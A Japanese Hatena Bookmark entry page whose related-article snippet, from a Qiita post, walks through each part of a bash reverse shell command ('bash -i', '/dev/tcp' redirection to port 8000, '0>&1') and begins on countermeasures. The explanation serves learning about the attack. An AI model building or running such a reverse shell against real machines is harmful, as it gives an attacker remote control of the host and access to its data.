
エントリーの編集

エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
記事へのコメント0件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています

- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
リバースシェル秒で体験 - Qiita
bash: 新しいBashシェルを起動する i:シェルを対話型にし、ユーザーがコマンドを入力できるようにする... bash: 新しいBashシェルを起動する i:シェルを対話型にし、ユーザーがコマンドを入力できるようにする。 >&:標準出力(stdout)と標準エラー(stderr)の両方を指定された場所にリダイレクトする。 /dev/tcp//8000: stdoutとstderrをリダイレクトする場所を指定する。この場合、8000番ポートのIPアドレスのリモートサーバへのTCP接続にリダイレクトされます。 0>&1:標準入力(stdin)をstdoutとstderrと同じ場所にリダイレクトし、ユーザーが同じTCP接続を通じてコマンドを入力できるようにします。 するとEC2側からローカルの情報が見放題・・・おそろしや 発展 本攻撃の対処 被害者側で接続を切ろうとしても既にリモートホスト(攻撃者側)に接続されているためリモートホスト側でプロセスを終了する必要があるはず だから被害者側の対処としてはシェ